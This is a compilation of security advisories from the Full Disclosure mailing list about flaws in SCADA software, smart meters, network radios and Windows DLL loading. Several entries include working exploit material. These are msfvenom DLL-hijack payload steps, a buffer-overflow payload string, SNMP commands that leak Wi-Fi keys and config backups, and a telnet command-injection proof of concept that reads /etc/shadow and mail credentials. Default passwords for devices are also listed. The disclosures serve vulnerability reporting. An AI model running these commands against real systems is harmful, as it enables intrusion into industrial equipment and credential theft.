AFFECTED PRODUCTS

The following versions of Schneider Electric’s Wondeware InduSoft Web
Studio are affected:

Wonderware InduSoft Web Studio v8.0 Patch 3 and prior versions.


IMPACT

Successful exploitation of this vulnerability could allow an authenticated
user to escalate his or her privileges.


VULNERABILITY OVERVIEW


INCORRECT DEFAULT PERMISSIONS CWE-276
Upon installation, Wonderware InduSoft Web Studio creates a new directory
and two files, which are placed in the system’s path and can be manipulated
by non-administrators. This could allow an authenticated user to escalate
his or her privileges.

The directory and files are added to system’s PATH. Therefore, the
following can be manipulated by non-administrator users:

• File C:\Bin\x86\aahClientManaged.dll has weak permissions: ALLOW NT
AUTHORITY\Authenticated Users: FILE_WRITE_DATA FILE_APPEND_DATA DELETE
• File C:\Bin\x86\ has weak permissions: ALLOW NT AUTHORITY\Authenticated
Users: FILE_ADD_FILE FILE_ADD_SUBDIRECTORY FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES DELETE

CVE-2017-7968 has been assigned to this vulnerability. A CVSS v3 base score
of 7.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Trihedral VTScada Multiple Vulnerabilities

[Karn Ganeshen]

Vendor: Trihedral
Equipment: VTScada
Vulnerability: Resource Consumption, Cross-Site Scripting, Information
Exposure
Advisory URL:
https://ipositivesecurity.com/2017/06/15/ics-trihedral-vtscada-multiple-vulnerabilities/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-164-01


AFFECTED PRODUCTS

The following versions of VTScada, an HMI SCADA software, are affected:

VTScada Versions prior to 11.2.26


IMPACT


Successful exploitation of these vulnerabilities could result in
uncontrolled resource consumption, arbitrary code execution, or information
exposure.


VULNERABILITY OVERVIEW


UNCONTROLLED RESOURCE CONSUMPTION CWE-400


The client does not properly validate the input or limit the amount of
resources that are utilized by an attacker, which can be used to consume
more resources than are available.

CVE-2017-6043
 has been
assigned to this vulnerability. A CVSS v3 base score of 7.5 has been
assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

).

Exploitation

Note that this vulnerability targets the VTScada thick client installed on
the system. Any application user (including a non-admin, restricted user)
who has access to the thick client can potentially bring down the system.

Payload can be up to ~80k characters. Repeated attempts result in spiked
CPU usage & consumption of RAM / page resources. Where a full-blown
application (or multiple applications in production scenario) is deployed,
i.e. with an operational/functional configuration, memory/CPU usage is
notably higher than that of a test, blank application. Repeatedly
submitting such a large username input, rapidly consumes available server
memory resources leading to resource exhaustion. This forces a system
reboot eventually.

Where an endpoint security solution (such as AV/HIPS/Anti-Malware) is
deployed on the system, resource exhaustion may be achieved relatively much
faster (quickly).

CROSS-SITE SCRIPTING CWE-79 

A cross-site scripting vulnerability may allow JavaScript code supplied by
the attacker to execute within the user’s browser.

CVE-2017-6053
 has been
assigned to this vulnerability. A CVSS v3 base score of 6.5 has been
assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

).

Exploitation

Multiple URLs and parameters were found to vulnerable to Reflected
Cross-Site Scripting.

INFORMATION EXPOSURE CWE-548


Some files are exposed within the web server application to unauthenticated
users. These files may contain sensitive configuration information.

CVE-2017-6045
 has been
assigned to this vulnerability. A CVSS v3 base score of 7.5 has been
assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

).

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Digital Canal Structural Wind Analysis Stack Buffer Overflow

[Karn Ganeshen]

Vendor: Digital Canal Structural
Equipment: Wind Analysis
Vulnerability: Stack-Based Buffer Overflow
Advisory URL:
https://ipositivesecurity.com/2017/06/15/ics-digital-canal-structural-wind-analysis-stack-buffer-overflow/

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-157-02


AFFECTED PRODUCTS


The following versions of Wind Analysis, a structural engineering software
platform, are affected:

Wind Analysis versions 9.1 and prior.


IMPACT


Successful exploitation of this vulnerability could cause the device that
the attacker is accessing to become unavailable, resulting in a denial of
service.


VULNERABILITY OVERVIEW


STACK-BASED BUFFER OVERFLOW CWE-121


An attacker may be able to run arbitrary code by remotely exploiting an
executable to perform a denial-of-service attack.

CVE-2017-7910
 has been
assigned to this vulnerability. A CVSS v3 base score of 7.5 has been
assigned; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

).


Exploitation

Note: This is a local exploit, not remote.

Vulnerable application
reconfig.exe

Exploit -> EIP overwrite
C:\dcc\wind9> reconfig.exe 

Payload
“A”*576 + “B”*4 + “C”*420

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Microsoft Machine Debug Manager (mdm) DLL side loading vulnerability

[Karn Ganeshen]

Microsoft Machine Debug Manager (mdm) DLL side loading vulnerability
Vulnerability: DLL Hijacking / DLL Side Loading

Advisory URL:
https://ipositivesecurity.com/2017/06/15/microsoft-machine-debug-manager-mdm-insecure-library-loading-allows-code-execution/


ABOUT


The Machine Debug Manager, mdm.exe, is a program that provides support for
program debugging.

Machine Debug Manager (mdm.exe) is known to be either installed standalone,
or is part of / packaged with the following:


Products


Riven (Red Orb)
Windows 2000 Professional Debug/Checked Build (Microsoft)
SDKs and Tools (Microsoft)
Visual C++ (Microsoft)
BackOffice Server 2000 (Microsoft)
Visual Studio 6.0 (Microsoft)
MSDN Disc 2466 (Microsoft)
MSDN Disc 1550 (Microsoft)
Windows (Microsoft)
Servers (Microsoft)
Windows 2000 (Microsoft)
Windows 2000 Professional (Microsoft)
SQL Server (Microsoft)
Windows 2000 Professional - Dell Reinstallation CD (Microsoft)
Visual Studio (Microsoft)
Office (Microsoft)
Windows 2000 - Dell Reinstallation CD (Microsoft)
Platforms, Servers, Applications (Microsoft)
Platforms (Microsoft)
Applications, Platforms, Servers (Microsoft)

Note: the list above is not exhaustive.


DETAILS


During the testing, it was found that MDM is affected with DLL hijacking
vulnerability. The following conditions are required to exploit MDM DLL
hijacking vulnerability:

1. MDM (mdm.exe) is installed
2. Disable script debugging (Other) option is not selected (IE -> Internet
Options -> Advanced)

Tested on Windows 7 SP1, when MDM is installed and enabled on the system,
it was seen to be triggered via multiple Windows applications, as well as
via Windows Administrative service console(s) (*.msc).

When mdm.exe is triggered, it looks for a specific DLL file - msdbgen.dll -
in directories defined in the PATH env variable. It an attacker and / or a
malicious user can place a specially crafted DLL file in any of these
directories, then it is possible to execute arbitrary code with the
privileges of target user. This can potentially result in the attacker
achieving complete control of the affected system.

Exploitation could be performed via multiple Windows applications. A few
scenarios are listed:


Exploitation environment:


a. Windows 7 SP1
b. Folder - C:\app-folder-RW\ - configured in system PATH env variable
c. Generate calc.exe payload as dll file
msfvenom –p windows/exec cmd=calc.exe –f dll –o msdbgen.dll
d. This dll is placed in C:\app-folder-RW\



Test Scenario 1 - Microsoft Windows built-in Administrative Service
Consoles


This behavior can be exploited even if the target user (administrator /
privileged user) does not run any software.

When the target user (administrator) opens certain Window built-in
administrative tools, mdm.exe is triggered. Some of these *.msc, that
resulted in loading our malicious dll and successfully executed code are:

Services - services.msc
Performance Management - perfmon.msc
Printer Management - printmanagement.msc
Group Policy Editor - gpedit.msc
Resultant Set of Policies - rsop.msc
Component Services - comexp.msc -> triggers services.msc

-> calc opens

In most cases, once the administrator opens up any of the above listed
Windows management service consoles, our code is executed, and then the
service consoles open up with a slight delay. No crashes, easy privilege
escalation and continued persistence without raising flags, eh.


Test Scenario 2 - MS Office 2013 SP1 (MS Access)


a)
Open MS Access 2013
Menu -> External Data Menu
Select any option - Import Text File / Import XML File etc
-> calc opens

b)
Open MS Access 2013
Create a Table
Export to PDF or Export to Table
-> calc opens


Test Scenario 3 - MS Office 2013 SP1 (Excel/Access/Word/others)


Open any of the MS Office applications
Menu -> Accounts -> About  -> Tech Support
-> calc opens


Test Scenario 4.1 - MS HTML Help files (chm)


Open any chm file
-> calc opens


Test Scenario 4.2 - Product Help Manual Windows (chm)


Open any Windows software
Open its Help / Support / Manual / Documentation option
-> calc opens



+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Microsoft Office Patch Installer Executables - Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Microsoft Office Patch Installer Executables - Insecure Library Loading
Allows Code Execution
Vulnerability: DLL Hijacking / DLL Side Loading

Advisory URL:
https://ipositivesecurity.com/2017/06/15/microsoft-office-patch-installers-insecure-library-loading-allow-code-execution/


ABOUT


Microsoft Office Patch installer executables are found to be vulnerable to
DLL side loading / hijacking issue.

This issue was observed when installing a patch for Microsoft Excel 2013
SP1. Patch installer for Microsoft Word was also tested and confirmed to
exhibit the same behavior. Other patch installers may also be vulnerable.

When the patch installer is run, specific DLL file(s) are looked for in the
current directory, that is, the directory from where this patch installer
is run. If an attacker and / or a malicious user can place a crafted DLL
file(s) in the current directory from where this patch installer is run,
then it is possible to execute arbitrary code with the privileges of the
user (administrator installing Microsoft Excel / Word / other Office
applications).

This is also applicable where installer is run from a shared folder on
another system
(\\server\shared_folder\mso2013-kb3127968-fullfile-x86-glb.exe).

Note 1: these dlls are loaded by - mso2013-kb3127968-fullfile-x86-glb.exe -
before Microsoft Executable Installer - msiexec.exe - starts.

Note 2: In case of Microsoft Word patch update installation, in addition to
installer exe (word2013-kb3128004-fullfile-x86-glb.exe) looking for DLLs in
current directory, once msiexec.exe runs as part of the installation
process, it looks for & loads several DLLs (for example, netmsg.dll) from
directories in PATH env variable, leading to code execution if we can place
our malicious dll.


Tested versions

Verified on Windows 7 32-bit SP1 + MS Office 2013 SP1

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Carlo Gavazzi VMUC-EM - Multiple Vulnerabilities

[Karn Ganeshen]

*VMU-C Web-Server solution for photovoltaic applications*

VMU-C EM is a data logger system for small to medium projects, VMUC-Y EM is
a hardware data aggregator for medium to larger projects and Em2 Server is
a software solution for large projects. They are designed to complement the
extensive line of Carlo Gavazzi energy meters and current transformers.

*ICS-CERT advisory*
https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03

*CVE-IDs*
CVE-2017-5144
CVE-2017-5145
CVE-2017-5146

*Vulnerable versions*

   - VMU-C EM prior to firmware Version A11_U05, and
   - VMU-C PV prior to firmware Version A17


*1. Weak Credentials Management*
-> admin/admin
-> Application does not enforce mandatory password change

*2. Sensitive Information stored in clear-text*
Accounts menu option
⇒ shows username and password
⇒ passwords shown in clear-text
⇒ SMTP server password
⇒ user and service passwords are stored in clear-text

*3. Access Control flaws*

   1. Access control is not enforced correctly
   2. Certain application functions can be accessed without any
   authentication
   3. Application stores the Energy / Plant data in a sqlite database -
   EWPlant.db. Anyone can dump plant database file - without any authentication

*4. Reflected + Stored XSS - multiple URLs, parameters - *Not documented in
ICS-CERT Advisory

Successful exploitation of this vulnerability could allow an
unauthenticated attacker to inject arbitrary JavaScript in a specially
crafted URL request where the response containing user data is returned to
the web browser without being made safe to display.

*5. Vulnerable to Cross-Site Request Forgery*

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Cambium SNMP Security Vulnerabilities

[Karn Ganeshen]

Cambium SNMP Security Vulnerabilities

AFFECTED PRODUCTS

Cambium ePMP 1000
Cambium ePMP 2000
Cambium PMP XXX
Cambium ForceXXX models
Potentially all other models

IMPACT

These vulnerabilities may allow an attacker to access device configuration
as well as make unauthorized changes to the device configuration.

Disclosure Timelines

First reported to ICS-CERT - Sep 12, 2017
Latest vendor response - Apr 5, 2017
Fix planned for Q2 2017
Public Disclosure - Apr 6, 2017


BACKGROUND

Through its extensive portfolio of reliable, scalable and secure wireless
narrowband and wireless broadband networks, Cambium Networks makes it
possible for all service providers; industrial, enterprise, government, and
service providers to build affordable, reliable, high-performance
connectivity. Our wireless networks enable industrial Internet of things
(IIoT) connectivity, and for service providers to improve customer
satisfaction and efficiency.

SNMP Feature

SNMP is a standard protocol employed by many types of Internet protocol
based products and allows centralized and remote device management
capabilities. One of the many standard SNMP capabilities enables users to
manage the product, including accessing device configuration, making
changes, as well as triggering back up and restore.

Specific to Cambium devices:

* It is possible to access full device configuration using SNMP. Device
configuration includes usernames, passwords, SSIDs, keys, certificates,
syslog config, and other network & wifi specific details.
* It is possible to trigger configuration backups, which can then be
retrieved using SNMP.
* It is possible to wipe out and / or make changes to the device
configuration remotely.

VULNERABILITY OVERVIEW

A. SNMP COMMUNITY STRINGS PRIVILEGES ARE NOT ENFORCED CORRECTLY

It is possible to use SNMP ReadOnly community string to access MIBs that
should only be accessible using ReadWrite community string (for example
Wireless key). Different versions leak different pieces of RW-only
accessible information. Current version (at the time of reporting 3.2)
allowed RO string to read WPA2 key.

For example:

snmpget -v2c -c public  1.3.6.1.4.1.17713.21.3.8.2.4.0


B. DEVICE CONFIGURATION BACKUPS – ACCESS CONTROL ISSUES

Using SNMP, device configuration backups can be remotely triggered. Using
specific MIBs, we can:
1. trigger the backup, and
2. identify exact backup file name, & location.

In case any backup file(s) are already present, their names & locations can
also be retrieved.

Trigger backup
snmpset -v2c -c private  1.3.6.1.4.1.17713.21.6.4.10.0 i 1
iso.3.6.1.4.1.17713.21.6.4.10.0 = INTEGER: 1

Get backup file location & name
snmpget -v2c -c public  1.3.6.1.4.1.17713.21.6.4.13.0
iso.3.6.1.4.1.17713.21.6.4.13.0 = STRING: "
http://IP/dl/3.2.2_00.json";

All the backup files are uploaded on the web server root directory /, and
lack any access control. Anyone can enumerate & dump the backup
configuration file(s) directly. Using the information in device
configuration, it may be possible to gain access to the device, and / or
its clients (wireless devices and users).

+
Metasploit module will be released shortly.
+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SenNet Data Logger appliances and Electricity Meters Multiple Vulnerabilities

[Karn Ganeshen]

SenNet Data Logger appliances and Electricity Meters Multiple
Vulnerabilities

Note: Vendor has released the fix. Details to be documented in ICS-CERT
Advisory.

About
SenNet is a trademark of Satel Spain that offers monitoring and
remote-control solutions for businesses. Our engineers develop, integrate
and test the products of SenNet in our facilities in Madrid (Spain).

http://www.sennetmonitoring.com/wp-content/uploads/2016/05/Datasheet_owa31I-.pdf

Vulnerable products

SenNet Optimal DataLogger appliance
SenNet Solar DataLogger appliance
SenNet Multitask Meter

Deployment Geography
Americas and Europe regions

Target Audience / Industry
Energy, Power, Service Providers, Telecom

Note: all appliances seem to be running on the same code base, and
therefore, all SenNet models, and software versions stand vulnerable.

Appliances Confirmed affected:

SenNet Solar
Datalogger Model: OWA3X
Serial Number: A04WCJ
Licence type: A02
Version: V5.03-1.56a

SenNet Optimal
Datalogger Model: OWA31
Serial Number: A05B89
License type: A02
Version: V5.37c-1.43c

SenNet Multitask Meter
Datalogger Model: OWA3X
Serial Number: A04ZZ3
Licence type: A02
Version: V5.21a-1.18b

SenNet Optimal is a monitoring solution to meter consumption (electricity,
gas, water) and other variables (temperature, humidity, presence, lighting
…); both for industries and for businesses in the tertiary sector.

http://www.sennetmonitoring.com/en/sennet-optimal-2/

SenNet Solar is a solution for monitoring. It is suitable for any kind of
power generation plants. In this type of facilities, it is essential to
monitor and remotely control the devices involved in the process:
inverters, meters, trackers, etc.

http://www.sennetmonitoring.com/en/sennet-solar/

SenNet Meter is an ideal device for electricity submetering.
http://www.sennetmonitoring.com/en/electricity-meters/

Vulnerability Details

1. No access control on the remote shell
The appliance runs ARM as underlying OS. Telnet access is enabled on TCP
port 5000. There is no authentication required for accessing and connecting
the remote shell. Any user can connect to the shell and issue commands.

2. Shell services running with excessive privileges (superuser)
The service runs with superuser root privileges, thus giving privileged
access to any user, without any authentication (exploited via OS Command
Injection described nexe).

3. OS Command Injection
The remote shell (attempts to) offer a restricted environment, and does not
allow executing system commands. However, it is possible to break out of
this jailed shell by chaining specific shell meta-characters and OS
commands.

The service / application is run as 'root' and OS command injection results
in full system access.

Apart from energy logging data, the device stores sensitive information
such FTP, SMTP and other service login credentials, used by the application
for functions, as well as to connect with other external, public facing
servers.

PoC:

# telnet IP 5000 2>/dev/null
Trying IP...
Connected to IP.
Escape character is '^Ü'.
$ true; id; pwd; cat /etc/shadow; ps; cat /home/etc/ssmtp/ssmtp.conf;
/bin/sh: $: not found
uid=0(root) gid=0(root)
/home
root:$1$:13852:0:9:7:::
nobody:*:13852:0:9:7:::
nfsnobody:!!:13852:0:9:7:::
  PID USER   VSZ STAT COMMAND
1 root  2412 Sinit
2 root 0 SW   ÄkthreaddÜ
3 root 0 SW   Äksoftirqd/0Ü

root=postmaster
mailhub=:25
rewriteDomain=example.com
hostname=_HOSTNAME_


4. Insecure Transport - all communications are clear-text, and prone to
sniffing.

+
Metasploit module will be released shortly.
+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sielco Sistemi Winlog SCADA Software Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Sielco Sistemi Winlog SCADA Software Insecure Library Loading Allows Code
Execution

Vendor: Sielco Sistemi
Equipment: Winlog SCADA Software
Vulnerability: Uncontrolled Search Path Element

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-038-01

AFFECTED PRODUCTS

The following Sielco Sistemi products are affected:

Winlog Lite SCADA Software, versions prior to Version 3.02.01, and
Winlog Pro SCADA Software, versions prior to Version 3.02.01

Vulnerable Libraries:
[+] applicom.dll
[+] w95_s7m.dll

Application Executables (that look for missing DLL):
PManager.exe
Runtime.exe

Steps to reproduce

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o applicom.dll

2. Place this dll in install directory (or C:\Windows, or any directory
defined in the PATH environment variable)
C:\evil-rw-folder\>

3. Run PManager.exe (or Runtime.exe) > calc.exe will execute


IMPACT

Successful exploitation of this vulnerability may allow an attacker to load
a malicious DLL and execute code on the affected system with the same
privileges as the application that loaded the malicious DLL.

VULNERABILITY OVERVIEW
UNCONTROLLED SEARCH PATH ELEMENT (CWE-427)

An uncontrolled search path element (DLL Hijacking) vulnerability has been
identified. Exploitation of this vulnerability could give an attacker
access to the system with the same level of privilege as the application
that utilizes the malicious DLL.

CVE-2017-5161 has been assigned to this vulnerability. A CVSS v3 base score
of 7.2 has been assigned; the CVSS vector string is
(AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H).

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] LAquis SCADA Access Control Vulnerability

[Karn Ganeshen]

LCDS – Leão Consultoria e Desenvolvimento de Sistemas LTDA ME LAquis SCADA
Access Control Vulnerability

Vendor: LCDS – Leão Consultoria e Desenvolvimento de Sistemas LTDA ME
Equipment: LAquis SCADA
Vulnerability: Improper Access Control

ICS-CERT Advisory
https://ics-cert.us-cert.gov/advisories/ICSA-17-075-01

AFFECTED PRODUCTS

The following versions of LAquis SCADA, an industrial automation software,
are affected:
LAquis SCADA software, Versions 4.1 and prior versions released before
January 20, 2017.

IMPACT
Successful exploitation of this vulnerability could allow authenticated
system users to escalate their privileges and modify or replace application
files.

IMPROPER ACCESS CONTROL CWE-284
An Improper Access Control vulnerability has been identified, which may
allow an authenticated user to modify application files to escalate
privileges.

CVE-2017-6016 has been assigned to this vulnerability. A CVSS v3 base score
of 7.3 has been assigned; the CVSS vector string is
(AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).

VULNERABILITY OVERVIEW

SCADA LAquis software is vulnerable to local privilege escalation. EVERYONE
has FULL permissions over all the install files (*exe,*dll), therefore, it
is possible for any local, authenticated, non-admin user to replace/modify
original application files with malicious ones, and gain higher privileged
access once an administrative user runs the application. Other vectors are
possible as well.

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Python + PostgreSQL pgAdmin4 – Insecure Library Loading Allows Code Execution

[Karn Ganeshen]

Python + PostgreSQL pgAdmin4 – Insecure Library Loading Allows Code
Execution (DLL Hijacking Vulnerability)

*Confirmed on*
pgAdmin4 v1.1: Current version packaged with PostgreSQL v9.6.1.1 (Windows
x86 Current version)

*Checked on*
Windows 7 SP1 + python 2.7.13 (current version)

Note - This is a vulnerability in python, which gets manifested via
pgAdmin4. Other applications and softwares that use python, may as well be
vulnerable.

*Download*
http://www.enterprisedb.com/postgresql-961-installers-win32?ls=Crossover&type=Crossover

*Vulnerability / Exploitation Details*

This vulnerability can allow attackers to execute arbitrary code on
vulnerable installations of pgAdmin4 software. pgAdmin4 is a GUI
application for database server administration, and comes packaged with
PostgreSQL package.

User interaction is required to exploit this vulnerability in that the
malicious dll file(s) should be saved in any of the DLL search paths.

During the course of its operations, pgAdmin4 looks for specific DLLs.
These DLLs are missing from the default application install directory, the
application then looks for such dll’s in various locations including
directories listed in PATH variable, and therefore, this vulnerability
arises.

Case 1 – *uuid.dll*

By placing an arbitrary malicious DLL files named as uuid.dll, in any one
of the locations configured in PATH variable, an attacker is able to force
the process to load an arbitrary, malicious DLL. This allows an attacker to
execute arbitrary code in the context of the (privileged) Admin user, when
it is run.

Note 1: According to Dave from pgAdmin4 team –
In the case of uuid.dll, the one DLL that fails to load entirely after
exhausting Window's search mechanism, there is also little we can do. The
search for this library is initiated entirely by the Python interpeter, not
by any of our code. *Any bug here is therefore a Python bug, not pgAdmin*.

Case 2 – *other dlls*

Multiple other dlls (system related IMO), are also missing from the install
directories, and looked for within the pgAdmin4 installation directories.

*Steps to reproduce*

Case 1 – uuid.dll:

1. Generate a dll payload
msfvenom –p windows/exec cmd=calc.exe –f dll –o uuid.dll

2. Place this dll in any directory defined in the PATH environment
variable, e.g.

C:\app-folder-RW\
Or
C:\Windows\

3. Start pgAdmin4.exe -> calc.exe

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] BINOM3 Electric Power Quality Meter Vulnerabilities

[Karn Ganeshen]

*Universal multifunctional Electric Power Quality Meter BINOM3 - Multiple
Vulnerabilities*

*About*
The meters are designed for autonomous operation in automated systems:
• SCADA systems
• Data aquisition and transmission systems
• Automated data and measurement systems for revenue and technical power
metering
• Power quality monitoring and control systems
• Automated process control systems, Management information system

+
*Submitted to ICS-CERT *- May 25, 2016.
*No response from vendor till date.*
+

*Vulnerability Information*

*HTTP*

1. *Reflected **XSS* – multiple urls, parameters
Successful exploitation of this vulnerability could allow an
unauthenticated as well as authenticated, attacker to inject arbitrary
JavaScript in a specially crafted URL request where the response containing
user data is returned to the web browser without being made safe to display.

2. *Stored **XSS* – multiple urls, parameters
Successful exploitation of this vulnerability could allow an authenticated
attacker to inject arbitrary JavaScript in specific input fields, which get
stored in the underlying db, and once accessed, the data including
malicious scripts, is returned to the web browser leading to script
execution.

3. *Weak Credentials Management *
The device comes configured with four (4) login accounts:
- admin / 1
- user / 1
- alg / 1
- telem / 1

3a) These passwords do not meet even basic security criterion.
3b) To further make it easier for attacker(s), the application design does
not provide the users, any option to change their own passwords in device
management portal. Only 'root' can change passwords for all other accounts.
(AFAIK)

4.* Undocumented root account *
In addition to the above four documented login accounts, there is a 'root'
superuser account:
- root / root
- root account details are not documented in the device administration
guide or manuals
- root account has multiple, additional functions accessible like user
management

5. *Sensitive Information stored in clear-text *
- all user passwords are stored / viewable in clear-text

Additionally, specific non-root, non-privileged users can access complete
device configuration file, which contains clear-text passwords and other
config information. This flaw can be used to gain privileged access to the
device.

6*. Vulnerable to Cross-Site Request Forgery *

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as configuration
parameter changes, and saving modified configuration.

7. *Sensitive information leakage*

Every time ‘root’ logs in, a GET request is made to a specific url to
access password configuration file.

Response comes as xml data, and contains all accounts and their passwords.
As, by default, the management portal is configured for HTTP, a suitably
positioned attacked can sniff all login credentials, and gain privileged
access.

*Telnet *

1. *Access Control Issues*
By default, password authentication is not enabled on Telnet access (AFAIK).
- This access gives superuser-level access to device
- Access to the device provides detailed info on application,
configuration, device file system, databases (including Energy & billing),
consumption, Statistics, network information, as well as clear-text creds
(FTP)
- Easy vector to device & data compromise

+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] ELNet Energy & Electrical Power Meter - Mulitple Vulnerabilities

[Karn Ganeshen]

*ELNet **Energy & Electrical Power Meter - Mulitple Vulnerabilities*


http://elnet.feniks-pro.com/Elnet-LT.php

http://www.elnet.cc/product/elnet-lt/


Powermeter with color graphic display for all electrical measurements and
harmonics, with TCP/IP and RS485 communication (ModBus and Bacnet), panel
mounted 96X96 mm.


*Product Description*

General

Simple operated menus.

   - Multilingual support.
   - Up to One year of energy data logging.
   - Displays up to 64th Harmonic in Waveform or Graphic.
   - 1600 samples per cycle.
   - Accuracy 0.2 %.
   - Accuracy 0.1% with special calibration, that can be ordered.
   - Build in T.O.U. Energy meter.
   - RS485 Communication Port (MODBUS, Bacnet MS/TP).
   - State of the art Graphic LCD
   - Modern 320 x 240 LCD display.
   - Displays of Waveform and Bar graph.
   - Simple installation- Panel mounted. Dimension: 96×96 mm.
   - Flash memory stores 6 months of energy.


   - TCP/IP communication port + WEB server
   - BacNet TCP/IP

*Standard approvals:*

IEC 62053-22, IEC 62053-23, IEC 62052-11


Large consumers of electricity e.g. factories, hotels, hospitals,
municipalities, need to know the history of their consumption and the
quality and the values of the power supply. Details such as Voltage,
Current, Power Factor, Hertz, Neutral Current, Energy consumption can be
displayed by the ELNet LT

Energy & Powermeter.


An additional feature of the Powermeter is the ability to measure
Harmonics. Part of the Electricity Supply Authority’s bill reflects poor or
good Harmonics in the consumer’s system, therefore it is in his interest to
monitor Harmonics and try to improve it.


The ELNet LT Energy & Powermeter is a compact, multi functional, three-phase
 Powermeter simple to install and is especially designed to integrate into
Building Management Systems. It requires no special mounting and is ideally
suited for mounting on the front face of any standard electrical panel.


The Configuration and Setup is menu driven, with password protection.


+


*Vulnerabilities*


1. *Unauthenticated Web Management access*

ELNet power meters can be managed via Java applet over a web browser. Meter
console and all its functions are accessible.


By default, no authentication is required to access the web console.



*2. Weak Credential Management*

In order to perform certain specific functions in ELNet power meters,
passwords are required. These passwords are, really just a formality.


For example:


Default password code to access Technical Menu for device configuration is –

1 (One)


*Default password – 6474*

- To reset I,V,F Peak Values

- To display /reset power peak value


+

It appears that password/code functionality is implemented for the sake of
getting the compliance check-list ticked.


Not only the default passwords are poor/weak, the system does not have a
mechanism to enforce a mandatory password change.


3. *Password Recovery Functionality*


But what if, just what if, someone does want security and changes the
default passwords, and forgets/lose them??


According to vendor:

*It is not recommended to forget your new passwords.*


The manual also doesn't seem to document Password Recovery either.


+

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Multiple vulnerabilities - Powerlogic/Schneider Electric IONXXXX series Smart Meters

[Karn Ganeshen]

*Powerlogic/Schneider Electric ION series Smart Meters - Multiple
security issues*

*Impacted devices:*

*ION7300 and potentially all ION models (based off of Powerlogic) *For
example, Power Measurement Ltd. Meter ION 7330V283 ETH ETH7330V274
http://www.schneider-electric.com/download/hk/en/details/2254511-ETH-7330-V274/?reference=ETH7330V274


*About*
Power & Energy Monitoring System
Compact energy and power quality meters for feeders or critical loads

The PowerLogic ION7300 series meters help you:
• reduce energy and operations costs
• improve power quality, reliability and uptime
• optimize equipment use
for optimal management of your electrical installation and greater
productivity

Used in enterprise energy management applications such as feeder monitoring
and sub-metering, ION7300 Series meters offer unmatched value,
functionality, and ease of use. ION7300 Series meters interface to
PowerLogic StrxureWare software or other automation systems to give all
users fast information sharing and analysis.

ION7300 Series meters are an ideal replacement for analogue meters, with a
multitude of power and energy measurements, analogue and digital I/O,
communication ports, and industry-standard protocols. The ION7330 meter has
on-board data storage, emails of logged data, and an optional modem. The
ION7350 meter is further augmented by more sophisticated power quality
analysis, alarms and a call-back-on-alarm feature.

*Applications*
- Power monitoring and control operations.
- Power quality analysis.
- Cost allocation and billing.
- Demand and power factor control.
- Load studies and circuit optimisation.
- Equipment monitoring and control.
- Preventive maintenance.

*Rebranded or used as is, by different organizations *

*Canada*
Telus Mobility
Futureway Communications
Radiant Communications
Acadia University
Loyalist College
Seneca College
TBayTel

*Mexico*
Universidad Nacional Autonoma de Mexico

*USA*
Frontier Communications
Cox Communications
Avon Old Farms School
University of Pennsylvania
Princeton University
City of Glenwood Springs, Electric Department
University of California, Santa Cruz
City of Thomasville Utilities
Comcast Cable
Verizon Wireless
City Of Hartford
AT&T Internet Services
CNS-Internet
Comcast Business Communications
AT&T U-verse

*Vulnerabilities *

*HTTP Web Management portal *

Provides stats for Monitor Energy, Revenue, Peak Demand, Voltage
Disturbances.

*No access control* – by default no Authentication is configured, to access
device’s web management portal.

